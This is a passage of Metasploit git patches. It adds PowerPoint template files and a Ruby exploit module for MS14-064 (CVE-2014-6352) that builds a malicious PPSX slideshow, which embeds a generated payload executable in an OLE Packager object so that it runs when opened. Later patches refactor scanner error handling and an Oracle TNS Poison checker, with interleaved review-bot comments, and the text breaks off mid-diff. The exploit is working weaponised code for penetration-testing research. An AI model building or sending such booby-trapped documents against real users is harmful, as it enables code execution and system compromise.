a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml new file mode 100755 index 0000000000..0eddc5e510 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/drawings/vmlDrawing1.vml @@ -0,0 +1,31 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/media/image1.wmf new file mode 100755 index 0000000000000000000000000000000000000000..b3bb5b267d7a7ca38acd8bf34c090b35af2f9f89 GIT binary patch literal 3722 zcmeH~KTH!*9LIlmfXW}EZVo0=5)&6m9J;tD3>qgwikip_PDB$4iDA&uI2ebf38kZT zXCP|g;6S={AOYGCf-F!#{&Z;XuGj0G-}m12dTq(|orz)b*Z1z;UGIIq?|t9z3NM$< zB#Fl;Md=Z5MV=|tOVoAmB9Tgw3+!eOYQI`<4X9BXr5m`cswIcrCHkb`z$(S2Uc8(d zeDaw3`o8~EZgtOojZ!}TbnczEmuZa|cf{X0OLoRL5~Bje8^g8G28H_^=S? zYjm5pi5}pr;KRc`iHpXOklw@+Dy)3XurBd;DJb3);>+8+-gud#?FO^EB zX;vx~y;3piMKg@1qG{!}QZ>!rM@PZ@jg1X-tXdZM2#;^@&<&%h=(^@B=yiN@BFpDf z2qhuO*EG$<_`$DBG*r%-g*OFxzGYc#3B2Mr3hg$Rbna4Eey~KlN(g?fW>%37Zk+8E zpNL<@s?|;;)))TQ1RoN06~9-F<>0<~8O8XgrycW0@T)u+zoSHb(PjC%j`0gVj`9*A z__powU5S>pI4gBADj9!}Y&Q6o#Y#Q=vw)O;IlOngX4|I{{tG@{fv^&cU&No1puq2s z$Cs5rKJi47a-cI7JD61Ru!|O2RNr z@XO_Lko!dN-{ZRy?Gvddl{*WNZLnG7^Z8JGNVqCKv;1BO?7_i7E|<$@vr9`$f5B%G z%^@TJ2ln$97U^^v@a5&@j(p?-I`V-x4lQdTRveFQZfD34|1!ktCN$H!Ek(w^%djClHq-6k-(*20{pG5Elgo;ZEbvfydzxj zy<|Z5;6VOhJef=;7K_Qi@eKaIDijKbhll%tQP|(dGrPOHfRBxhNy7g>b}kOE{h6w; zEf#AHD{Ld!hZ^a*M6)xm?hfM+p@_Q=yh_+EB7X24ouaBku{W=0r)G%Qo{#k$q7Qt( R#*&Y|MM>-f73$*s{s45a(DMKQ literal 0 HcmV?d00001 diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml new file mode 100755 index 0000000000..5bdee5f19a --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presProps.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml new file mode 100755 index 0000000000..fbd9609f50 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/presentation.xml @@ -0,0 +1,13 @@ + + + + + + + + + + + + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout10.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout11.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout2.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null 
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout3.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout4.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout5.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout6.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout7.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file 
diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout8.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels new file mode 100755 index 0000000000..0ab2c475a7 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/_rels/slideLayout9.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml new file mode 100755 index 0000000000..7eceb2fb28 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout1.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master subtitle style11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml new file mode 100755 index 0000000000..c66c858dd6 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout10.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file 
diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml new file mode 100755 index 0000000000..59966d7d92 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout11.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml new file mode 100755 index 0000000000..f4d0d72750 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout2.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml new file mode 100755 index 0000000000..b13d8c6559 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout3.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml new file mode 100755 index 0000000000..9088e3f76e --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout4.xml 
@@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml new file mode 100755 index 0000000000..dba15f74fb --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout5.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text stylesClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml new file mode 100755 index 0000000000..7f549a0480 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout6.xml @@ -0,0 +1,2 @@ + +Click to edit Master title style11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml new file mode 100755 index 0000000000..4bb2d51956 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout7.xml @@ -0,0 +1,2 @@ + +11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml new file mode 100755 index 0000000000..5189b5791f --- /dev/null 
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout8.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth levelClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml new file mode 100755 index 0000000000..923dcd343e --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideLayouts/slideLayout9.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text styles11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels new file mode 100755 index 0000000000..6a191ab986 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/_rels/slideMaster1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml new file mode 100755 index 0000000000..60def160d1 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slideMasters/slideMaster1.xml @@ -0,0 +1,2 @@ + +Click to edit Master title styleClick to edit Master text stylesSecond levelThird levelFourth levelFifth level11/12/2014‹#› \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels new file mode 100755 index 0000000000..c1937b38ec --- /dev/null 
+++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/_rels/slide1.xml.rels @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml new file mode 100755 index 0000000000..8dbbce1549 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/slides/slide1.xml @@ -0,0 +1,2 @@ + +ExampleExamplestyle.visibilitystyle.visibility diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml new file mode 100755 index 0000000000..ecd5f7a019 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/tableStyles.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml new file mode 100755 index 0000000000..1f0f3c1072 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/theme/theme1.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml new file mode 100755 index 0000000000..f79eedf918 --- /dev/null +++ b/data/exploits/CVE-2014-6352/template_run_as_admin/ppt/viewProps.xml @@ -0,0 +1,2 @@ + + \ No newline at end of file diff --git a/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb new file mode 100644 index 0000000000..3ae471c636 --- /dev/null +++ b/modules/exploits/windows/fileformat/ms14_064_packager_run_as_admin.rb 
@@ -0,0 +1,153 @@ +## +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit3 < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + include Msf::Exploit::EXE + + def initialize(info={}) + super(update_info(info, + 'Name' => "MS14-064 Microsoft Windows OLE Package Manager Code Execution", + 'Description' => %q{ + This module exploits a vulnerability found in Windows Object Linking and Embedding (OLE) + allowing arbitrary code execution, publicly exploited in the wild as MS14-060 patch bypass. + The Microsoft update tried to fix the vulnerability publicly known as "Sandworm". Platforms + such as Windows Vista SP2 all the way to Windows 8, Windows Server 2008 and 2012 are known + to be vulnerable. However, based on our testing, the most reliable setup is on Windows + platforms running Office 2013 and Office 2010 SP2. And please keep in mind that some other + setups such as using Office 2010 SP1 might be less stable, and sometimes may end up with a + crash due to a failure in the CPackage::CreateTempFileName function. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Haifei Li', # Vulnerability discovery + 'sinn3r', # Metasploit module + 'juan vazquez' # Metasploit module + ], + 'References' => + [ + ['CVE', '2014-6352'], + ['MSB', 'MS14-064'], + ['BID', '70690'], + ['URL', 'http://blogs.mcafee.com/mcafee-labs/bypassing-microsofts-patch-sandworm-zero-day-even-editing-dangerous'] + ], + 'Payload' => + { + 'Space' => 2048, + 'DisableNops' => true + }, + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => + [ + ['Windows 7 SP1 / Office 2010 SP2 / Office 2013', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Oct 21 2014", + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('FILENAME', [true, 'The PPSX file', 'msf.ppsx']) + ], self.class) + end + + def exploit + print_status("Creating '#{datastore['FILENAME']}' file ...") + ole_stream = ole_packager + zip = zip_ppsx(ole_stream) + file_create(zip) + end + + def zip_ppsx(ole_stream) + zip_data = {} + data_dir = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2014-6352', 'template_run_as_admin') + + Dir["#{data_dir}/**/**"].each do |file| + unless File.directory?(file) + zip_data[file.sub(data_dir,'')] = File.read(file) + end + end + + # add the otherwise skipped "hidden" file + file = "#{data_dir}/_rels/.rels" + zip_data[file.sub(data_dir,'')] = File.read(file) + + # put our own OLE streams + zip_data['/ppt/embeddings/oleObject1.bin'] = ole_stream + + # create the ppsx + ppsx = Rex::Zip::Archive.new + zip_data.each_pair do |k,v| + ppsx.add_file(k,v) + end + + ppsx.pack + end + + def ole_packager + payload_name = "#{rand_text_alpha(4)}.exe" + + file_info = [2].pack('v') + file_info << "#{payload_name}\x00" + file_info << "#{payload_name}\x00" + file_info << "\x00\x00" + + extract_info = [3].pack('v') + extract_info << [payload_name.length + 1].pack('V') + extract_info << "#{payload_name}\x00" + + p = generate_payload_exe + file = [p.length].pack('V') + file << p + + append_info = 
[payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + append_info << [payload_name.length].pack('V') + append_info << Rex::Text.to_unicode(payload_name) + + ole_data = file_info + extract_info + file + append_info + ole_contents = [ole_data.length].pack('V') + ole_data + + ole = create_ole("\x01OLE10Native", ole_contents) + + ole + end + + def create_ole(stream_name, data) + ole_tmp = Rex::Quickfile.new('ole') + stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE) + + stm = stg.create_stream(stream_name) + stm << data + stm.close + + directory = stg.instance_variable_get(:@directory) + directory.each_entry do |entry| + if entry.instance_variable_get(:@_ab) == 'Root Entry' + # 0003000C-0000-0000-c000-000000000046 # Packager + clsid = Rex::OLE::CLSID.new("\x0c\x00\x03\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46") + entry.instance_variable_set(:@_clsId, clsid) + end + end + + # write to disk + stg.close + + ole_contents = File.read(ole_tmp.path) + ole_tmp.close + ole_tmp.unlink + + ole_contents + end +end + From b05198c05a554adf693eb1f03a49c7617747e40a Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 12 Nov 2014 07:32:06 -0800 Subject: [PATCH 24/38] Clean up failure messaging when bad CHOST --- lib/msf/core/auxiliary/scanner.rb | 26 ++++++++++++++++---------- 1 file changed, 16 insertions(+), 10 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index f2c50e9e39..21bf0f7de9 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb 
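Review bot: In create_ole the Rex::Quickfile is closed and unlinked only on the success path; if create_stream, stg.close or the File.read raises, the temporary file is left on disk, so the cleanup belongs in an ensure. The template files are read with File.read, which on Windows opens in text mode and can alter bytes in the binary media shipped under the template directory; `File.binread(file)` in zip_ppsx and `File.binread(ole_tmp.path)` in create_ole avoid that. The CLSID patching reaches into Rex::OLE internals via instance_variable_get/instance_variable_set, which will silently stop working if those ivars are renamed; a short comment naming that dependency (or an accessor on Rex::OLE::Storage) would make it explicit. The rewritten tail of create_ole with the ensure is below.
```ruby
  def create_ole(stream_name, data)
    ole_tmp = Rex::Quickfile.new('ole')
    begin
      stg = Rex::OLE::Storage.new(ole_tmp.path, Rex::OLE::STGM_WRITE)
      # … unchanged: stream creation and Root Entry CLSID handling …
      # write to disk
      stg.close
      File.binread(ole_tmp.path)
    ensure
      # always drop the scratch file, even when building the storage fails
      ole_tmp.close
      ole_tmp.unlink
    end
  end
```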
@@ -96,13 +96,13 @@ def run loop do # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Spawn threads for each host while (@tl.length < threads_max) # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? ip = ar.next_ip break if not ip @@ -131,7 +131,7 @@ def run end # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Exit once we run out of hosts if(@tl.length == 0) @@ -152,7 +152,7 @@ def run scanner_show_progress() if @show_progress end - scanner_report_fatal_errors + scanner_handle_fatal_errors return end @@ -171,7 +171,7 @@ def run nohosts = false # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? while (@tl.length < threads_max) @@ -218,7 +218,7 @@ def run end # Stop scanning if we hit a fatal error - break if @scan_errors.length > 0 + break if has_fatal_errors? # Exit if there are no more pending threads if (@tl.length == 0) @@ -241,7 +241,7 @@ def run scanner_show_progress() if @show_progress end - scanner_report_fatal_errors + scanner_handle_fatal_errors return end @@ -264,8 +264,12 @@ def seppuko! end end -def scanner_report_fatal_errors - return unless @scan_errors && @scan_errors.length > 0 +def has_fatal_errors? + @scan_errors && !@scan_errors.empty? +end + +def scanner_handle_fatal_errors + return unless has_fatal_errors? return unless @tl # First kill any running threads @@ -275,7 +279,7 @@ def scanner_report_fatal_errors @scan_errors.uniq.each do |emsg| print_error("Fatal: #{emsg}") end - print_status("Scan terminated due to one or more fatal errors") + print_error("Scan terminated due to one or more fatal errors") end def scanner_progress 
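Review bot: The predicate added in the `@@ -264,8 +264,12 @@` hunk is named `has_fatal_errors?`, and the `has_` prefix is redundant on a `?` method; `fatal_errors?` would read identically at every `break if` / `return unless` call site in the hunks above. It also yields `nil` rather than `false` while `@scan_errors` is still unset, which the truthiness checks tolerate but a caller comparing with `== false` would not; a one-line comment such as `# nil until @scan_errors is initialised; truthy once any thread recorded a fatal error` would record that. The `run` method the `break if` lines belong to starts and ends outside these hunks.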
@@ -284,6 +288,8 @@ def scanner_progress end def scanner_show_progress + # it should already be in the process of shutting down if there are fatal errors + return if has_fatal_errors? pct = scanner_progress if pct >= (@range_percent + @show_percent) @range_percent = @range_percent + @show_percent From e65864001440ceee7fa49a6f12e2673ac559e7bf Mon Sep 17 00:00:00 2001 From: Jon Hart Date: Wed, 12 Nov 2014 07:38:07 -0800 Subject: [PATCH 25/38] Show uniq error count --- lib/msf/core/auxiliary/scanner.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/lib/msf/core/auxiliary/scanner.rb b/lib/msf/core/auxiliary/scanner.rb index 21bf0f7de9..ac4991cbf0 100644 --- a/lib/msf/core/auxiliary/scanner.rb +++ b/lib/msf/core/auxiliary/scanner.rb @@ -276,10 +276,11 @@ def scanner_handle_fatal_errors @tl.each {|t| t.kill if t.alive? } # Show the unique errors triggered by the scan - @scan_errors.uniq.each do |emsg| + uniq_errors = @scan_errors.uniq + uniq_errors.each do |emsg| print_error("Fatal: #{emsg}") end - print_error("Scan terminated due to one or more fatal errors") + print_error("Scan terminated due to #{uniq_errors.size} fatal error(s)") end def scanner_progress From 955a5142ca27c71a18d666e380985d3ea082e2d5 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 12 Nov 2014 13:17:32 -0600 Subject: [PATCH 26/38] Edit e-mail address for antispam --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index cbc48eb1f1..94ad28d096 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb 
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary This module checks the server for vulnerabilities like TNS Poison. Module sends to server a packet with command to register new TNS Listener and check response. }, - 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] + 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], From d242bc220b7db145a6c5bd46a0a6fd0c459eda52 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 12 Nov 2014 13:25:10 -0600 Subject: [PATCH 27/38] Minor fixups and disclosure date for TNS module --- modules/auxiliary/scanner/oracle/tnspoison_checker.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb index 94ad28d096..49f42d61cb 100644 --- a/modules/auxiliary/scanner/oracle/tnspoison_checker.rb +++ b/modules/auxiliary/scanner/oracle/tnspoison_checker.rb @@ -16,13 +16,16 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Oracle TNS Listener Checker', 'Description' => %q{ This module checks the server for vulnerabilities like TNS Poison. - Module sends to server a packet with command to register new TNS Listener and check response. + Module sends a server a packet with command to register new TNS Listener and checks + for a response indicating an error. If the registration is errored, the target is not + vulnearble. Otherwise, the target is vulnerable to malicious registrations. }, 'Author' => ['ir0njaw (Nikita Kelesis) '], # of Digital Security [http://dsec.ru] 'References' => [ [ 'URL', 'http://seclists.org/fulldisclosure/2012/Apr/204' ], ], + 'DisclosureDate' => 'Apr 18 2012', 'License' => MSF_LICENSE)) register_options( 
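Review bot: The third added description line in the `@@ -16,13 +16,16 @@` hunk misspells `vulnearble`; it should read `vulnerable. Otherwise, the target is vulnerable to malicious registrations.` The same sentence presents the verdict as certain, while `run_host` (hunk below) infers vulnerability only from the absence of `(ERROR_STACK=(ERROR=` in the first 100 bytes of the reply, so a truncated or silent response is reported the same way; a clause such as `A reply without an error block is treated as vulnerable, so results should be confirmed manually.` would set expectations. The `initialize` method this metadata belongs to starts and ends outside the hunk.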
@@ -30,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary Opt::RPORT(1521) ], self.class) - deregister_options('RHOST') + deregister_options('RHOST') # Provided by the TNS mixin, but not needed in a scanner module end def run_host(ip) @@ -41,6 +44,7 @@ class Metasploit3 < Msf::Auxiliary packet = sock.read(100) find_packet = packet.include? "(ERROR_STACK=(ERROR=" find_packet == true ? print_error("#{ip}:#{rport} is not vulnerable ") : print_good("#{ip}:#{rport} is vulnerable") + #TODO: Module should report_vuln if this finding is solid. rescue ::Rex::ConnectionError, ::Errno::EPIPE print_error("#{ip}:#{rport} unable to connect to the server") end From 9df31e950ffd9a35f5eec571594b15c6462d50c4 Mon Sep 17 00:00:00 2001 From: Pedro Ribeiro Date: Wed, 12 Nov 2014 21:32:33 +0000 Subject: [PATCH 28/38] Add OSVDB id --- modules/auxiliary/admin/http/manageengine_pmp_privesc.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb index 8b4361b4eb..c0349c53c0 100644 --- a/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb +++ b/modules/auxiliary/admin/http/manageengine_pmp_privesc.rb @@ -33,7 +33,7 @@ class Metasploit3 < Msf::Auxiliary 'References' => [ [ 'CVE', '2014-8499' ], - 